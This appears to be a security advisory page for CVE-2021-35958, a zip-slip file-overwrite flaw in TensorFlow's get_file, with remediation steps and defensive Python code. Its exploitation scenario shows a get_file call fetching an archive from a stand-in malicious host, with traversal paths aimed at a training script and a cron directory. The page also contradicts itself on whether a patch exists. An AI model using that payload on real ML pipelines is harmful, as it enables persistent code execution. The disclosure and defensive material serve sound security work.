CVE-2021-35958: TensorFlow: path traversal in get_file allows file overwrite

CRITICAL PoC AVAILABLE
Published June 30, 2021
CISO Take

Any ML pipeline that calls tf.keras.utils.get_file with extract=True against external or user-controlled URLs is vulnerable to zip-slip attacks that overwrite arbitrary files on the host, potentially escalating to code execution. Audit all pipeline code for this pattern immediately and replace it with validated extraction logic. Upgrade to TensorFlow 2.6+ and treat all remote archives as untrusted input regardless of source.

Risk Assessment

Critical (CVSS 9.1). No authentication or user interaction is required: attackers need only serve a malicious archive at a URL fetched by the ML pipeline. The file overwrite primitive escalates readily to code execution by targeting Python scripts, config files, or model artifacts. ML training pipelines routinely download external datasets and pre-trained models at scale, making the attack surface broader than in typical application CVEs. The vendor's position that the function 'isn't meant for untrusted archives' does not reduce operational risk where pipelines consume third-party datasets.

Affected Systems

Package: tensorflow
Ecosystem: pip
Vulnerable Range: not listed
Patched: No patch


Severity & Risk

CVSS 3.1
9.1 / 10
EPSS
1.1%
chance of exploitation in 30 days
Higher than 78% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network
AC Low
PR None
UI None
S Unchanged
C None
I High
A High

Recommended Action

  1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.

  2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs, and flag every instance for review.

  3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfile archives, use the 'data' extraction filter (available in Python 3.12 and backported to the 3.8.17, 3.9.17, 3.10.12, and 3.11.4 security releases) or manually check for absolute paths and '..' sequences in member names.

  4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.

  5. Implement file integrity monitoring on model artifacts and training data directories.

  6. For detection: scan infrastructure-as-code and pipeline code with Semgrep rules that match get_file calls with extract=True and tarfile.extractall calls made without path filtering.
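
The member path validation described in step 3 can be sketched in Python as follows. This is a minimal illustration, not TensorFlow's or Keras's implementation: the helper names safe_extract and _is_within are hypothetical, and the policy of rejecting every link and special file is a deliberately strict assumption that may be too conservative for some datasets.

```python
import os
import tarfile
import zipfile


def _is_within(base_dir: str, target: str) -> bool:
    """Return True if target resolves to base_dir or to a path beneath it."""
    base = os.path.realpath(base_dir)
    resolved = os.path.realpath(target)
    return os.path.commonpath([base, resolved]) == base


def safe_extract(archive_path: str, dest_dir: str) -> None:
    """Extract a zip or tar archive, refusing members that escape dest_dir.

    Hypothetical helper: validates every member first, then extracts.
    """
    os.makedirs(dest_dir, exist_ok=True)

    if zipfile.is_zipfile(archive_path):
        with zipfile.ZipFile(archive_path) as zf:
            for name in zf.namelist():
                # os.path.join discards dest_dir when name is absolute,
                # so absolute member names fail this check too.
                if not _is_within(dest_dir, os.path.join(dest_dir, name)):
                    raise ValueError(f"unsafe zip member: {name!r}")
            zf.extractall(dest_dir)
    elif tarfile.is_tarfile(archive_path):
        with tarfile.open(archive_path) as tf:
            for member in tf.getmembers():
                target = os.path.join(dest_dir, member.name)
                if not _is_within(dest_dir, target):
                    raise ValueError(f"unsafe tar member: {member.name!r}")
                # Strict assumption: allow only regular files and directories.
                if not (member.isfile() or member.isdir()):
                    raise ValueError(f"unsupported tar member: {member.name!r}")
            if hasattr(tarfile, "data_filter"):
                # Interpreters with extraction filters: add the 'data' filter.
                tf.extractall(dest_dir, filter="data")
            else:
                tf.extractall(dest_dir)
    else:
        raise ValueError(f"not a zip or tar archive: {archive_path!r}")
```

One way to use it is to download with get_file without extract=True and then call safe_extract on the returned path. Validating all members before extracting any of them means a rejected archive leaves nothing written to disk.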

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system use by external parties and third-party AI tools
NIST AI RMF
MS-2.5 - AI Software and Third-Party Component Risk Management
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2021-35958?

CVE-2021-35958 is a path traversal (zip-slip) vulnerability in TensorFlow through 2.5.0. When tf.keras.utils.get_file is called with extract=True, a crafted archive can overwrite arbitrary files on the host, which can escalate to code execution. The vendor's position is that get_file is not intended for untrusted archives, so any pipeline that fetches archives from external or user-controlled URLs should treat them as untrusted input and validate them before extraction.

Is CVE-2021-35958 actively exploited?

Proof-of-concept exploit code for CVE-2021-35958 is publicly available (indexed in trickest/cve), which increases the risk of exploitation. The composite exploitation signal on this page is rated medium.

How to fix CVE-2021-35958?

  1. Upgrade TensorFlow to 2.6.0 or later and review release notes for archive handling changes.

  2. Audit all codebases for the pattern get_file(..., extract=True) combined with external or user-supplied URLs, and flag every instance for review.

  3. Replace unsafe extraction with explicit archive member path validation: reject any member whose resolved path escapes the target directory. For Python tarfile archives, use the 'data' extraction filter (available in Python 3.12 and backported to the 3.8.17, 3.9.17, 3.10.12, and 3.11.4 security releases) or manually check for absolute paths and '..' sequences in member names.

  4. Run ML pipeline processes under least-privilege OS accounts with minimal write permissions to model and data directories.

  5. Implement file integrity monitoring on model artifacts and training data directories.

  6. For detection: scan infrastructure-as-code and pipeline code with Semgrep rules that match get_file calls with extract=True and tarfile.extractall calls made without path filtering.
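
Where Semgrep is not available, the audit and detection steps can be approximated with Python's standard ast module. The sketch below is a stand-in for a Semgrep rule, not an equivalent: the function name find_risky_calls is hypothetical, it matches on call names only, it ignores extract passed positionally, and it flags every extractall call that lacks a filter keyword (including zipfile calls, which take no such keyword) so that a human can review them.

```python
import ast


def _is_true(node) -> bool:
    """Return True if node is the literal constant True."""
    return isinstance(node, ast.Constant) and node.value is True


def _call_name(func: ast.AST) -> str:
    """Return the last component of the called name, e.g. 'get_file'."""
    if isinstance(func, ast.Attribute):
        return func.attr
    if isinstance(func, ast.Name):
        return func.id
    return ""


def find_risky_calls(source: str, filename: str = "<string>"):
    """Return sorted (filename, line, reason) tuples for calls worth reviewing."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node.func)
        kwargs = {kw.arg: kw.value for kw in node.keywords if kw.arg}
        if name == "get_file" and any(
            _is_true(kwargs.get(key)) for key in ("extract", "untar")
        ):
            findings.append((filename, node.lineno, "get_file with extraction enabled"))
        elif name == "extractall" and "filter" not in kwargs:
            findings.append((filename, node.lineno, "extractall without a filter argument"))
    return sorted(findings, key=lambda item: item[1])
```

Running find_risky_calls over each .py file in a repository yields a review list. Every hit still needs a manual check of where the URL or archive comes from.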

What systems are affected by CVE-2021-35958?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, data preprocessing pipelines, model loading and serving, CI/CD ML pipelines, notebook environments.

What is the CVSS score for CVE-2021-35958?

CVE-2021-35958 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.09%.

Technical Details

NVD Description

TensorFlow through 2.5.0 allows attackers to overwrite arbitrary files via a crafted archive when tf.keras.utils.get_file is used with extract=True. NOTE: the vendor's position is that tf.keras.utils.get_file is not intended for untrusted archives.

Exploitation Scenario

An adversary registers a lookalike domain mimicking a popular ML dataset repository or compromises a legitimate one. They publish a malicious .tar.gz archive containing a crafted entry with a traversal path such as ../../app/train.py or ../../etc/cron.d/mlbackdoor. When the ML training pipeline executes tf.keras.utils.get_file('dataset.tar.gz', origin='https://malicious-host/dataset.tar.gz', extract=True), TensorFlow extracts the archive without validating member paths. The attacker's payload overwrites a training script or scheduled task, which executes during the next model run or system event, achieving persistent code execution on ML infrastructure with the pipeline's credentials and network access.
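
To see why such member names are dangerous, it helps to resolve them against an extraction directory. The sketch below is illustrative only: the directory /home/ml/.keras/datasets and the helper names are assumptions chosen for the example, and posixpath is used so the result does not depend on the host operating system.

```python
import posixpath


def resolved_target(extract_dir: str, member_name: str) -> str:
    """Return where a naive extractor would write member_name."""
    return posixpath.normpath(posixpath.join(extract_dir, member_name))


def escapes(extract_dir: str, member_name: str) -> bool:
    """Return True if member_name resolves outside extract_dir."""
    base = posixpath.normpath(extract_dir)
    target = resolved_target(base, member_name)
    return target != base and not target.startswith(base + "/")


# Hypothetical extraction directory, for illustration only.
CACHE = "/home/ml/.keras/datasets"

print(resolved_target(CACHE, "../../app/train.py"))  # /home/ml/app/train.py
print(escapes(CACHE, "../../app/train.py"))          # True
print(escapes(CACHE, "/etc/cron.d/mlbackdoor"))      # True (absolute path)
print(escapes(CACHE, "images/cat.png"))              # False
```

Each '..' component climbs one directory, so two of them are enough to leave the dataset cache in this example. An absolute member name bypasses the extraction directory entirely.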

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
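
The 9.1 base score can be reproduced from this vector with the CVSS v3.1 base-score equations. The sketch below is a simplified calculator, not a full implementation: the function names are hypothetical, and it handles only Scope: Unchanged vectors, which is all this CVE needs.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place, as defined in the v3.1 specification."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a Scope: Unchanged CVSS v3.1 vector."""
    metrics = dict(item.split(":") for item in vector.split("/")[1:])
    if metrics["S"] != "U":
        raise NotImplementedError("this sketch handles Scope: Unchanged only")
    w = {key: WEIGHTS[key][metrics[key]] for key in WEIGHTS}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H"))  # 9.1
```

For this vector the impact sub-score is about 5.18 and the exploitability sub-score about 3.89. Their sum, about 9.06, rounds up to 9.1.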

Timeline

Published
June 30, 2021
Last Modified
November 21, 2024
First Seen
June 30, 2021

Related Vulnerabilities